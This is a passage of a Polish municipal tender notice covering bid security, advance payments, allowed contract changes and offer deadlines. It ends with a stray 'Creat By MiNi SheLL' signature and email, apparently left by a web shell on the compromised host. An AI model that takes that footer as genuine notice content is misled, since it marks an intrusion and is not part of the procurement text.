ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>1.5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego Gminy w Banku Spółdzielczym<br/>w Jastrzębiu Zdroju, Nr konta 02 8470 0001 2040 0051 5025 0003. Wadium powinno być wniesione przed upływem terminu<br/>składania ofert. Z treści przelewu winno wynikać, że wpłata dotyczy wadium, jakiego dotyczy pakietu i zamówienia.<br/>1.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej.<br/>1.7. O wpłaceniu wadium w formie pieniężnej w wymaganym terminie decyduje data i godzina wpływu środków na rachunek<br/>bankowy Zamawiającego.<br/>1.8. Z treści gwarancji i poręczeń musi wynikać bezwarunkowe, nieodwołalne i wykonalne na pierwsze pisemne żądanie<br/>Zamawiającego zobowiązanie gwaranta lub poręczyciela do zapłaty na rzecz Zamawiającego kwoty określonej w gwarancji<br/>lub poręczeniu, w okolicznościach, o których mowa w art. 98 ust. 6 ustawy Pzp,<br/>1.9. Gwarancje i poręczenia muszą podlegać prawu polskiemu. Wszystkie spory dotyczące gwarancji i poręczeń będą<br/>rozstrzygane zgodnie z prawem polskim przez polskie sądy powszechne. W przypadku, gdy Wykonawca wnosi wadium w<br/>formie gwarancji lub poręczenia w języku innym niż język polski, dokument gwarancji lub poręczenia należy złożyć wraz z<br/>tłumaczeniem na język polski.<br/>1.10. Wadium powinno być wniesione przed upływem terminu składania ofert.<br/>1.11. Oferta Wykonawcy, który nie wniesie wadium do terminu składania ofert na zasadach określonych w SWZ lub wniesie<br/>wadium w sposób nieprawidłowy lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub<br/>złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy pzp zostanie odrzucona.<br/>1.12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:<br/>1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe, z przyczyn leżących po stronie Wykonawcy,<br/>1.13. Zamawiający zatrzymuje również wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym<br/>mowa w art. 107 żądanie złożenia przedmiotowych środków dowodowych ust. 2 lub art. 128 wezwanie wykonawcy do<br/>złożenia, poprawienia lub uzupełnienia dokumentacji ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych<br/>środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57<br/>warunki ubiegania się o udzielenie zamówienia lub art. 106 inne przedmiotowe środki dowodowe ust. 1, oświadczenia, o<br/>którym mowa w art. 125 oświadczenie wykonawcy o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu lub kryteriów selekcji ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki,<br/>o której mowa w art. 223 badanie i ocena ofert ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez<br/>wykonawcę jako najkorzystniejszej.<br/>1.14. Zamawiający dokona zwrotu wadium zgodnie z zapisami art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 2.	Strony przewidują rozliczenie wynagrodzenia wykonawcy w oparciu o:<br/>1)	fakturę zaliczkową - (nie mniejszą niż 5,15 % przysługującego wykonawcy wynagrodzenia, ze środków własnych Zamawiającego* - zgodnie z zabezpieczonymi środkami w budżecie Gminy na 2024 rok<br/>2)	fakturę końcową – pozostała część wynagrodzenia – zgodnie z zabezpieczonymi środkami w budżecie Gminy na 2025 rok <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> a)	zajdzie konieczność wykonania robót dodatkowych, które w sposób obiektywny uniemożliwiają terminowe zakończenie realizacji przedmiotu umowy;<br/>b)	z powodów niezawinionych przez wykonawcę, pod warunkiem, że wykonawca pisemnie wykaże obiektywny brak swojej winy, w tym m.in. wobec konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, uzgodnień lub pozwoleń osób trzecich albo właściwych organów; oczekiwanie Wykonawcy na niezbędne opinie, decyzje, zezwolenia, uzgodnienia itp. wymagane obowiązującymi przepisami prawa, o ile okres wyczekiwania Wykonawcy nie wynika z braku podjęcia niezwłocznie lub wadliwego wykonywania przez Wykonawcę czynności niezbędnych do zainicjowania oraz prawidłowego przeprowadzenia właściwego postępowania celem uzyskania wskazanych powyżej niezbędnych opinii, decyzji, zezwoleń, uzgodnień, itp. przy czym o okres oczekiwania wykraczający poza termin wynikający z przepisów zobowiązanego do wydania opinii, decyzji, zezwoleń, uzgodnień, itp.<br/>c)	prace objęte umową zostały wstrzymane przez właściwe organy z przyczyn niezależnych od Wykonawcy co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;<br/>d)	w wyniku wystąpienia konieczności wykonania prac archeologicznych na terenie budowy, zamian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem umowy i nieprzewidywalnych, których brak wykonania uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy;<br/>e)	wystąpienia czynników zewnętrznych, typu: niemożliwe do przewidzenia zdarzenia losowe, jak np. pożar, powódź, huragan, itp., a także dłużej utrzymujące się niekorzystne warunki atmosferyczne uniemożliwiające prowadzenie robót;<br/>f)	z powodu działań osób trzecich uniemożliwiających wykonanie przedmiotu umowy, które to działania nie są konsekwencją winy którejkolwiek ze Stron;<br/>g)	zmiana terminu zakończenia umowy na skutek braków, lub błędów w dokumentacji projektowej, które to powodują konieczność wstrzymania czasowego realizacji robót.<br/>h)	koniecznych lub racjonalnych zmian w dokumentacji projektowej, konieczności wprowadzenia zmian polegających na zmianie jakości lub innych parametrów charakterystycznych dla danego elementu robót lub zmiana technologii,<br/>i)	kolizji z infrastrukturą podziemną, której nie ujęto w dokumentacji technicznej stanowiącej podstawę wyceny,<br/>j)	możliwości wprowadzenia zmiany korzystnej dla Zamawiającego.<br/>k)	z powodu opóźnienia w przekazaniu terenu budowy<br/>l)	z powodu opóźnienia w przekazaniu dokumentów budowy,<br/>m)	zmiany stanu prawnego mające wpływ na realizację zadania,<br/>n)	w przypadkach określonych w art. 455 ustawy prawo zamówień publicznych<br/>o)	dokonanie zamiany kierownika budowy (robót) na osobę o kwalifikacjach i doświadczeniu wymaganym w SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-zp.gaszowice.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-03 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com